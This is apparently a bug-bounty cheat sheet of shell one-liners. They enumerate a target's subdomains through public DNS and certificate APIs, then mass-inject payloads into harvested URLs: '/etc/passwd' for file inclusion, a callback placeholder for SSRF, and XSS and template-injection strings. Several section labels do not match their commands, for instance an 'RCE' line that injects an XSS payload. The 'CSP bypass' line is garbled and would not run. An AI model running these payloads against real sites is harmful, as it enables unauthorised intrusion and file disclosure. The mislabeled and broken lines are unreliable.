One-Liners tools for bug bounty
# Subdomain enumeration tools
subfinder -d target.com -silent # Enumerate subdomains using Subfinder dnsprobe -silent # Resolve DNS records for discovered subdomains cut -d ' ' -f1 # Extract subdomains from dnsprobe output grep --color 'api\|dev\|stg\|test\|admin\|demo\|stage\|pre\|vpn' # Filter subdomains containing specific keywords
# Passive subdomain enumeration sources
curl -s https://dns.bufferover.run/dns?q=.target.com | jq -r .FDNS_A[] | cut -d',' -f2 | sort -u # Using DNS bufferover.run API curl -s "https://riddler.io/search/exportcsv?q=pld:target.com" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u # Using Riddler search API nmap --script hostmap-crtsh.nse target.com # Query Certificate Transparency Logs using nmap script curl -s "https://certspotter.com/api/v1/issuances?domain=target.com&include_subdomains=true&expand=dns_names" | jq .[].dns_names | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u # Query Cert Spotter API curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u # Using Wayback Machine API curl -s "https://jldc.me/anubis/subdomains/target.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u # Using Anubis subdomain API curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u # Query CRT.SH Certificate Transparency Logs curl -s "https://api.threatminer.org/v2/domain.php?q=target.com&rt=5" | jq -r '.results[]' |grep -o "\w.*target.com" | sort -u # Using ThreatMiner API curl -s "https://jldc.me/anubis/subdomains/target.com" | jq -r '.' | grep -o "\w.*target.com" # Using Anubis subdomain API curl -s "https://www.threatcrowd.org/searchApi/v2/domain/report/?domain=target.com" | jq -r '.subdomains' | grep -o "\w.*target.com" # Using ThreatCrowd API curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" # Using HackerTarget API
# CNAME enumeration
ffuf -u https://FUZZ.target.com -w dns.txt -v | grep "| URL |" | awk '{print $4}' # Use FFuF for CNAME enumeration
# HTTP-related vulnerability scanning
cat subs.txt | xargs -P 50 -I % bash -c "dig % | grep CNAME" | awk '{print $1}' | sed 's/.$//g' | httpx -silent -status-code -cdn -csp-probe -tls-probe # Perform additional HTTP checks on the subdomains
# LFI (Local File Inclusion) vulnerability scanning
cat hosts | gau | gf lfi | httpx -paths lfi_wordlist.txt -threads 100 -random-agent -x GET,POST -tech-detect -status-code -follow-redirects -mc 200 -mr "root:[x*]:0:0:" # Scanning for LFI vulnerabilities using GF and HTTPX waybackurls target.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"' # Scanning for LFI vulnerabilities using Wayback URLs
# SSRF (Server-Side Request Forgery) vulnerability scanning
cat wayback.txt | gf ssrf | sort -u |anew | httpx | qsreplace 'burpcollaborator_link' | xargs -I % -P 25 sh -c 'curl -ks "%" 2>&1 | grep "compute.internal" && echo "SSRF VULN! %"' # Scanning for SSRF vulnerabilities using GF and HTTPX
# XSS (Cross-Site Scripting) vulnerability scanning
cat wayback.txt | grep "=" | qsreplace "burpcollaborator_link" >> ssrf.txt; ffuf -c -w ssrf.txt -u FUZZ # Scanning for XSS vulnerabilities using FFuF and Wayback URLs
# Remote Code Execution (RCE) vulnerability scanning
cat domains.txt | waybackurls | grep -Ev "\.(jpeg|jpg|png|ico)$" | uro | grep = | qsreplace "<img src=x onerror=alert(1)>" | httpx -silent -nc -mc 200 -mr "<img src=x onerror=alert(1)>" # Scanning for RCE vulnerabilities using URO
# Content Security Policy (CSP) bypass scanning
gau target.com grep '='| qsreplace hack\" -a | while read url;do target-$(curl -s -l $url | egrep -o '(hack" | hack\\")'); echo -e "Target : \e[1;33m $url\e[om" "$target" "\n -"; done I sed 's/hack"/[xss Possible] Reflection Found/g' # Scanning for CSP bypass vulnerabilities
# Template Injection vulnerability scanning
cat hosts.txt | httpx -nc -t 300 -p 80,443,8080,8443 -silent -path "/?name={{this.constructor.constructor('alert(\"foo\")')()}}" -mr "name={{this.constructor.constructor('alert(" # Scanning for Template Injection vulnerabilities using HTTPX